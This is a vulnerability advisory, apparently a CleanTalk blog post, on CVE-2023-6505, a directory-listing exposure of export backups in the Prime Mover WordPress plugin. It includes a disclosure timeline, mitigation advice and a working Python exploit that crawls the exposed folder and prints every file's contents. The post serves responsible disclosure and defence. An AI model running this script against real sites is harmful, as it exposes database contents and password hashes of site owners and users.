A critical vulnerability has been uncovered in the Prime Mover plugin, specifically within the directory http://your_site/wordpress/wp-content/uploads/prime-mover-export-files/1/. This vulnerability not only reveals comprehensive information about the site, including its configuration, directories, and files, but more critically, it grants unauthorized access to sensitive data within the database, presenting a significant security risk. The exploitation of this vulnerability could lead to potential brute force attacks on password hashes, posing an imminent threat to the compromise of the entire system.
Main info:
CVE | CVE-2023-6505 |
Plugin | Prime Mover < 1.9.3 |
Critical | Super High |
All Time | 160 361 |
Active installations | 8 000+ |
Publicly Published | December 12, 2023 |
Last Updated | December 12, 2023 |
Researcher | Dmtirii Ignatyev |
OWASP TOP-10 | A3: Sensitive Data Exposure |
PoC | Yes |
Exploit | Yes |
Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6505 https://wpscan.com/vulnerability/eca6f099-6af0-4f42-aade-ab61dd792629/ |
Plugin Security Certification by CleanTalk | |
Timeline
November 24, 2023 | Plugin testing and vulnerability detection in the Prime Mover plugin have been completed |
November 24, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
December 2, 2023 | The author fixed the vulnerability and released the plugin update |
December 12, 2023 | Registered CVE-2023-6505 |
Discovery of the Vulnerability
A severe vulnerability has been discovered in the directory http://your_site/wordpress/wp-content/uploads/prime-mover-export-files/1/. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.
Understanding of Directory Listing attack’s
Directory listing vulnerabilities involve the unintended exposure of directory contents, allowing unauthorized users to view files and directories. In WordPress, this could inadvertently reveal sensitive information, such as configuration details and file structures. Real-world examples highlight the risk of attackers leveraging such exposures to gain insights into the site’s infrastructure, potentially leading to unauthorized access and manipulation of sensitive data.
Exploiting the Directory Listing Vulnerability
Exploiting the vulnerability in Prime Mover involves utilizing the exposed directory to gain unauthorized access to sensitive data. Attackers may specifically target files containing password hashes, using this information to launch brute force attacks. Successful exploitation could lead to unauthorized access, manipulation of data, and other malicious activities, ultimately compromising the integrity and security of the entire system.
POC:
0) Go to packages and create new (If there is no backup now)
1) Go to this URL manualy – http://your_site/wordpress/wp-content/uploads/prime-mover-export-files/1/
2) Or you can use Exploit
EXPLOIT (python3):
import requests from bs4 import BeautifulSoup import re import time base_url = "http://127.0.0.1/wordpress/wp-content/uploads/prime-mover-export-files/1/" processed_files = set() processed_folders = set() def get_file_names(url): response = requests.get(url) if response.status_code == 200 and len(response.text) > 0: soup = BeautifulSoup(response.text, 'html.parser') links = soup.find_all('a') file_names = [] for link in links: file_name = link.get('href') if file_name != "../" and not file_name.startswith("?"): file_names.append(file_name) return file_names return [] def get_file_content(url, file_name): file_url = url + file_name # Игнорируем файлы, где в конце '.zip' или '.zip.*' if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE): print(f"Ignoring file: {file_name}") return None file_response = requests.get(file_url) if file_response.status_code == 200: return file_response.text return None while True: folders = get_file_names(base_url) if folders: print("Folders on the page:") for folder_name in folders: if folder_name not in processed_folders: print(folder_name) folder_url = base_url + folder_name files_in_folder = get_file_names(folder_url) if files_in_folder: print("File names in the folder:") for file_name in files_in_folder: if file_name not in processed_files: print(file_name) file_content = get_file_content(folder_url, file_name) if file_content is not None: print("File content:") print(file_content) processed_files.add(file_name) processed_folders.add(folder_name) time.sleep(5)
___
The potential risk associated with this vulnerability is severe. In real-world scenarios, attackers could exploit the exposed directory to conduct reconnaissance on the site’s structure, locate critical files, and access sensitive data within the database. This could lead to unauthorized access, data manipulation, and other malicious activities, jeopardizing the security of the entire system.
Recommendations for Improved Security
- Directory Security Measures: Implement robust security measures for directories, including access controls and regular audits to detect and address vulnerabilities promptly.
- Database Encryption: Employ encryption for sensitive data stored in the database to safeguard it even if unauthorized access occurs.
- Plugin Update: Ensure that the Prime Mover plugin is regularly updated with the latest security patches to address this vulnerability.
- Password Policy: Enforce strong password policies to minimize the risk of successful brute force attacks.
By implementing these security measures, administrators can significantly reduce the risk of unauthorized access and data exposure associated with the Prime Mover vulnerability.
#WordPressSecurity #DirectoryListing #WebsiteSafety #StayProtected #SuperHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.